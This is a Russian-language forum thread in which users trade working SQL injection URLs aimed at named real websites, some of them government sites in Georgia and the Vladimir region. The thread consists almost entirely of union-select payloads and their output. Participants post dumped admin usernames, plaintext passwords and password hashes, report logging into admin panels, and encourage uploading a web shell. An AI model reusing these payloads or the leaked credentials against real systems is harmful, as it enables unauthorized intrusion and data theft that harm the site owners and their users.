Не выводит на полях http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/* version() Что делать?
Я сам с осетии а сайт этот моей фирмы где я работаю моя задача найти дыру и покозать её! Я её нашел но вот возникает вопрос! Почему не выводит http://15rus.ru/txt.php?cat=-3+union+select+1,2,3,4,5,6,7,8/* version()???
http://www.maxivetlanda.se/view_2008.php?katid=-1+union+select+concat(0x3a3a,loginnamn,0x3a3a,losenord,0x3a3a)+from+anv+limit+0,1/* login: super password: duper http://www.maxivetlanda.se/admin
Имха... тебе таблы нужны =\ (Зацени какой красивый вывод ) Я бы на твоём месте заинтересовался этой: Залить шеллтеперь дело техники... кибби круто описал всё... дерзай
Нашёл админа имя и пороль: Mihael:3fde6bb0541387e4ebdadf7c2ff31123 пороль: 1q2w3e Не заходит почему? http://15rus.ru//forum/index.php
Эмм, там таблиц с юзерами пхпбб форума аж 3 - http://15rus.ru/txt.php?cat=-3+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.columns+where+column_name=0x757365726E616D65/* Тебе нужна не phpbb_users, а phpbb2_users, ибо у мну ща выпала ошибка - phpBB : Critical Error Error obtaining user details DEBUG MODE SELECT * FROM phpbb2_users WHERE user_id = -1 =/ Правильный запрос выглядит так - http://15rus.ru/txt.php?cat=-3+union+select+1,concat(username,0x3a,user_password),3,4,5,6,7,8,9+from+u19256.phpbb2_users+where+user_level=1/* Это 4 админа форума, теперь расшифровывай хэши
грузинский сайтег The So cial Subsi dy Agency http://www.ssa.gov.ge Code: http://www.ssa.gov.ge/index.php?id=-88+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* version() - 4.0.27 user() - ssa_gov_ge@localhost database() - ssa_gov_ge Пробовал получить доступ к mysql.user , но его нету.
А подскажите плиз как увидеть поле... ....pricelist.php?step=2&server=-2%20union%20select%20concat_ws(0x3a3a,table_name,column_name)%20from%20information_schema.columns+limit+237,1-- Этим запросом мы видим Table and Column в БД information_schema как сделать так чтоб было видно поле в колонке?
видимо немного не так меня понели или это я не понимаю так как 1 раз инъекцию провожу У меня есть БД information_schema в ней есть в ней есть таблица user_list в этой таблице есть поля такие как pass и login и мне нужно посмотреть значение этих полей. С помощью этого запроса я вижу таблицу и колонку user_list:ass
БД (перебирать limit+0т 0,1 до 37,1 http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,table_name,6+from+INFORMATION_SCHEMA.tables+limit+0,1-- Верися: 5.0.67-log http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,version(),6-- БД system http://www.maccasoft.com/news.php?id=-12+union+select+1,2,3,4,column_name,6+from+INFORMATION_SCHEMA.columns+where+table_name=0x73797374656d-- 0x73797374656d = system так как идет фильтрация =)
avo.ru - Администрация Владимирской области Взлом через сайт admgor.avo.ru Code: http://admgor.avo.ru/mun_zak/mun_zak.php?type=2&state_id=-1+union+select+concat_ws(0x3a,username,email,password,usertype),2,3,4,5+from+aleksandrov.jos_users+limit+0,1/* login : admin password : zxcvbnm098 статус : Super Administrator Полазил по админке http://avo.ru/administrator/ - и халяву сразу прикрыли
Code: http://www.avi-trucks.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,0,0,0,0,0,0,0,0,0,0,0,0,%20%200,0,0,0/**/from/**/jos_users/*
1) _http://www.info.gomel.by/news.php?id=-12+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),DATABASE()),6,7,8,9,10,11,12/* 2) _http://www.wemarketu.com/news.php?id=-12+union+select+1,2,concat_ws(0x3a,user(),version(),DATABASE()),4/* Юзер:Версия БД: БД
ЮЗЕР ВЕРСИЯ-БД БАЗА ДАННЫХ http://djexx.com/news.php?id=-12+union+select+1,concat_ws(0x3a,user(),version(),DATABASE()),3,4,5,6,7,8,9,10-- БАЗЫ данных ( перебирать limit'ом от 0,1 до 28,1) http://djexx.com/news.php?id=-12+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables+limit+1,1-- там не чего интересного нет кто найдет что побольше, выкладывайте
ЮЗЕР ВЕРСИЯ БАЗА ДАННЫХ http://www.etc-nepal.org/news.php?id=-12+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6/* http://teamhardcorepavement.com/news.php?id=-12+union+select+concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7/*